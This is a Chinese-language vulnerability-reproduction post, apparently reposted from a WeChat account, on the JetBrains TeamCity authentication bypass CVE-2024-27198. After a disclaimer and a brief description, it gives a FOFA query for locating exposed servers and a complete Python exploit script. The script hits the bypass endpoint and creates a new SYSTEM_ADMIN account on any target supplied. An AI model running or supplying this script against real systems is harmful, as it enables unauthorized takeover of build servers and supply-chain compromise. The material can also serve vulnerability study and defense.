【漏洞复现】JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)

免责声明

本文所涉及的任何技术、信息或工具，仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响，均由使用者个人承担责任，与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。

漏洞描述

JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证，创建管理员账户，完全控制所有TeamCity项目、构建、代理和构件，为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。

资产测绘

FOFA：body="Log in to TeamCity"

漏洞复现

import requests
import urllib3
import argparse
import re
urllib3.disable_warnings()

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target",required=True, help="Target TeamCity Server URL")
parser.add_argument("-u", "--username", required=True,help="Insert username for the new user")
parser.add_argument("-p", "--password",required=True, help="Insert password for the new user")
args = parser.parse_args()

vulnerable_endpoint = "/pwned?jsp=/app/rest/users;.jsp" # Attacker’s path to exploit CVE-2024-27198, please refer to the Rapid7's blogpost for more information

def check_version():
    response = requests.get(args.target+"/login.html", verify=False) 
    repattern = r'<span class="vWord">Version</span>(.+?)</span>' # Regex pattern to extract the TeamCity version number
    try:
        version = re.findall(repattern, response.text)[0]
        print("[+] Version Found:", version)
    except:
        print("[-] Version not found")

def exploit():
    response = requests.get(args.target+vulnerable_endpoint, verify=False, timeout=10)
    http_code = response.status_code
    if http_code == 200:
        print("[+] Server vulnerable, returning HTTP", http_code) # HTTP 200 Status code is needed to confirm if the TeamCity Server is vulnerable to the auth bypass vuln
        create_user = {
            "username": args.username,
            "password": args.password,
            "email": f"{args.username}@mydomain.com",
            "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}, # Given admin permissions to your new user, basically you can have complete control of this TeamCity Server
        }
        headers = {"Content-Type": "application/json"}
        create_user = requests.post(args.target+vulnerable_endpoint, json=create_user, headers=headers, verify=False) # POST request to create the new user with admin privileges
        if create_user.status_code == 200:
            print("[+] New user", args.username, "created succesfully! Go to", args.target+"/login.html to login with your new credentials :)")
        else:
            print("[-] Error while creating new user")

    else:
        print("[-] Probable not vulnerable, returning HTTP", http_code) 

check_version()
exploit()

原文始发于微信公众号（漏洞文库）：【漏洞复现】JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)